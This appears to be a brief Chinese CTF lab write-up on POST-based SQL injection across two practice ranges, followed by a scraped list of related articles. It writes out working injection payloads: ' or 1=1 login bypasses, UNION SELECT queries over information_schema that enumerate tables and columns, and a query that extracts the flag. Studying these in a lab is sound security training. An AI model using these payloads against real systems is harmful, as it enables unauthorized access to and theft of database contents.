靶场一

输入任意密码查看输出

发现输出有单引号
所以试试万能密码' or 1=1 -- qwe

可以成功

判断字段数

输入 order by 语句

有3个字段，第4个字段找不到

判断输入点

为2，3

查询表名

‘ or 1=2 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 0,1 — qwe

找到flag表

查询列名

‘ and password=’’ or 1=2 union select 1,column_name,3 from information_schema.columns where table_schema=database() and table_name=’flag’ limit 0,1 — qwe’

找到flag

查询flag

‘ and password=’’ union select 1,2,flag from flag limit 0,1 #

提交flag

提交成功

靶场二

我们需要用双引号和括号使之闭合，所以万能密码为 ") or 1=1 -- qwe

剩下的操作与作业一类似

直接放结果

简单的POST sql注入相关推荐

测试具有44个漏洞点的简单小靶场-SQL注入篇
文章目录本地搭建 SQL注入篇注入1(数字型注入) 注入2(闭合单引号) 注入3(闭合双引号) 注入4(闭合括号) 注入5(报错注入) 注入6(布尔盲注) 注入7(过滤了'--'和'#'以及'%2 ...
什么是简单的分析SQL注入漏洞
如今非常多人在入侵的过程中基本都是通过SQL注入来完毕的,可是有多少人知道为什么会有这种注入漏洞呢?有的会随口说着对于字符的过滤不严造成的. 可是事实是这样吗?我们学这些.不仅要知其然.更要知其所以然 ...
一次简单的SQL注入靶场练习
一次简单的SQL注入靶场练习文章目录一次简单的SQL注入靶场练习前言一.靶机下载二.靶场渗透 1.端口扫描总结前言为了巩固SQL注入以及实战演练的需要,我们来做一次简单的关于SQL注入 ...
怎么进行mysql注入测试_MySQL for Java的SQL注入测试
只要你学JDBC,基本上所有的人都会和你说,Statement不能防止SQL注入, PreparedStatement能够防止SQL注入. 基本上参加工作了一段时间之后还是这么认为的, 没错, 这句是 ...
mysql数据库sql注入原理_sql注入原理详解（一）
防止SQL注入: 1.开启配置文件中的magic_quotes_gpc和magic_quotes_runtime设置 2.执行sql语句时使用addslashes进行sql语句转换 3.Sql语句书写 ...
MySQL for Java的SQL注入测试
2019独角兽企业重金招聘Python工程师标准>>> 只要你学JDBC,基本上所有的人都会和你说,Statement不能防止SQL注入, PreparedStatement能够防止 ...
sql注入的原理详解
sql注入原理详解(一) 我们围绕以下几个方面来看这个问题: 1.什么是sql注入? 2.为什么要sql注入? 3.怎样sql注入? 1.什么是sql注入? 所谓SQL注入,就是通过把SQL命令插入到 ...
关于web安全之sql注入攻击
前言:①这个晨讲我构思了两个星期,但是之前电脑坏了,一直拖到昨天才开始着手准备,时间仓促, 能力有限,不到之处请大家批评指正: ②我尽量将文中涉及的各种技术原理,专业术语讲的更加通俗易懂,但这个前提是 ...
SQL 注入（SQL Injection）学习心得
提示:文章写完后,目录可以自动生成目录文章目录前言一.SQL 注入是什么? 二.SQL 注入攻击手法 1.联合查询注入 2.基于错误信息的注入 3.基于布尔的盲注 4.基于时间的盲注三.注入 ...
Web安全篇之SQL注入攻击
在网上找了一篇关于sql注入的解释文章,还有很多技术,走马观花吧文章来源:http://www.2cto.com/article/201310/250877.html ps:直接copy,格式有点问 ...

简单的POST sql注入

靶场一